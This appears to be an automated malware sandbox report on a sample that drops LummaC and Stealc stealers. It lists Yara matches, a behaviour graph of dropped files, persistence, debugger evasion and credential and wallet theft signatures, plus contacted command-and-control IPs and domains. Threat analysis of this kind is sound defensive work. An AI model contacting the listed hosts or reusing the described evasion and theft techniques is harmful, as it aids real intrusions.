Source: Yara match File source: Process Memory Space: 847ee125a0.exe PID: 8180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 847ee125a0.exe PID: 2248, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: da3bdc2ac0.exe PID: 5368, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 847ee125a0.exe PID: 8180, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 847ee125a0.exe PID: 2248, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000025.00000003.2660381905.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2719200023.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2718154872.00000000009B1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6bf436adc7.exe PID: 3896, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0030EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_0030EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0030DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_0030DF51
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572015 Sample: file.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 119 youtube.com 2->119 121 youtube-ui.l.google.com 2->121 123 33 other IPs or domains 2->123 145 Suricata IDS alerts for network traffic 2->145 147 Found malware configuration 2->147 149 Malicious sample detected (through community Yara rule) 2->149 151 19 other signatures 2->151 11 skotes.exe 4 28 2->11         started        16 file.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 139 185.215.113.43, 49758, 49764, 49796 WHOLESALECONNECTIONSNL Portugal 11->139 141 185.215.113.16, 49802, 49821, 49847 WHOLESALECONNECTIONSNL Portugal 11->141 143 31.41.244.11, 49770, 80 AEROEXPRESS-ASRU Russian Federation 11->143 107 C:\Users\user\AppData\...\06c8dc661c.exe, PE32 11->107 dropped 109 C:\Users\user\AppData\...\da3bdc2ac0.exe, PE32 11->109 dropped 111 C:\Users\user\AppData\...\6bf436adc7.exe, PE32 11->111 dropped 117 7 other malicious files 11->117 dropped 187 Creates multiple autostart registry keys 11->187 207 3 other signatures 11->207 22 847ee125a0.exe 11->22         started        26 C1J7SVw.exe 8 11->26         started        29 6bf436adc7.exe 11->29         started        31 da3bdc2ac0.exe 11->31         started        113 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->113 dropped 115 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->115 dropped 189 Detected unpacking (changes PE section rights) 16->189 191 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->191 209 2 other signatures 16->209 33 skotes.exe 16->33         started        193 Antivirus detection for dropped file 18->193 195 Suspicious powershell command line found 18->195 197 Machine Learning detection for dropped file 18->197 211 3 other signatures 18->211 35 powershell.exe 18->35         started        37 explorer.exe 18->37         started        199 Found many strings related to Crypto-Wallets (likely being stolen) 20->199 201 Tries to harvest and steal ftp login credentials 20->201 203 Tries to harvest and steal browser information (history, passwords, etc) 20->203 205 Tries to steal Crypto Currency Wallets 20->205 39 firefox.exe 20->39         started        file6 signatures7 process8 dnsIp9 127 atten-supporse.biz 104.21.32.1, 443, 49815, 49822 CLOUDFLARENETUS United States 22->127 153 Antivirus detection for dropped file 22->153 155 Multi AV Scanner detection for dropped file 22->155 157 Detected unpacking (changes PE section rights) 22->157 177 4 other signatures 22->177 99 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 26->99 dropped 101 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 26->101 dropped 159 Contains functionality to register a low level keyboard hook 26->159 41 cmd.exe 2 26->41         started        129 185.215.113.206, 49846, 80 WHOLESALECONNECTIONSNL Portugal 29->129 161 Hides threads from debuggers 29->161 163 Tries to detect sandboxes / dynamic malware analysis system (registry check) 29->163 165 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 29->165 167 Binary is likely a compiled AutoIt script file 31->167 44 taskkill.exe 31->44         started        46 taskkill.exe 31->46         started        48 taskkill.exe 31->48         started        57 3 other processes 31->57 169 Machine Learning detection for dropped file 33->169 171 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 33->171 173 Tries to evade debugger and weak emulator (self modifying code) 33->173 175 Tries to detect virtualization through RDTSC time measurements 33->175 50 PING.EXE 35->50         started        53 conhost.exe 35->53         started        131 youtube.com 142.250.181.110 GOOGLEUS United States 39->131 133 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 39->133 135 4 other IPs or domains 39->135 55 firefox.exe 39->55         started        file10 signatures11 process12 dnsIp13 179 Uses cmd line tools excessively to alter registry or file data 41->179 59 in.exe 1 41->59         started        63 7z.exe 2 41->63         started        65 7z.exe 3 41->65         started        77 9 other processes 41->77 67 conhost.exe 44->67         started        69 conhost.exe 46->69         started        71 conhost.exe 48->71         started        125 127.1.10.1 unknown unknown 50->125 73 conhost.exe 57->73         started        75 conhost.exe 57->75         started        signatures14 process15 file16 103 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 59->103 dropped 181 Suspicious powershell command line found 59->181 183 Uses cmd line tools excessively to alter registry or file data 59->183 185 Uses schtasks.exe or at.exe to add and modify task schedules 59->185 79 powershell.exe 59->79         started        82 attrib.exe 59->82         started        84 attrib.exe 59->84         started        86 schtasks.exe 59->86         started        105 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 63->105 dropped signatures17 process18 signatures19 213 Uses ping.exe to check the status of other devices and networks 79->213 88 PING.EXE 79->88         started        91 conhost.exe 79->91         started        93 conhost.exe 82->93         started        95 conhost.exe 84->95         started        97 conhost.exe 86->97         started        process20 dnsIp21 137 127.0.0.1 unknown unknown 88->137
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.32.1
 atten-supporse.biz United States
13335 CLOUDFLARENETUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
142.250.181.110
 youtube.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
127.1.10.1
 unknown unknown
unknown unknown true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.196.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 151.101.65.91 true
dyna.wikimedia.org 185.15.58.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.110 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
atten-supporse.biz 104.21.32.1 true
youtube-ui.l.google.com 142.250.181.78 true
reddit.map.fastly.net 151.101.193.140 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
normandy.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    formy-spill.biz false
      		high
      https://atten-supporse.biz/api false
        		high
        atten-supporse.biz false
          		high
          dwell-exclaim.biz false
            		high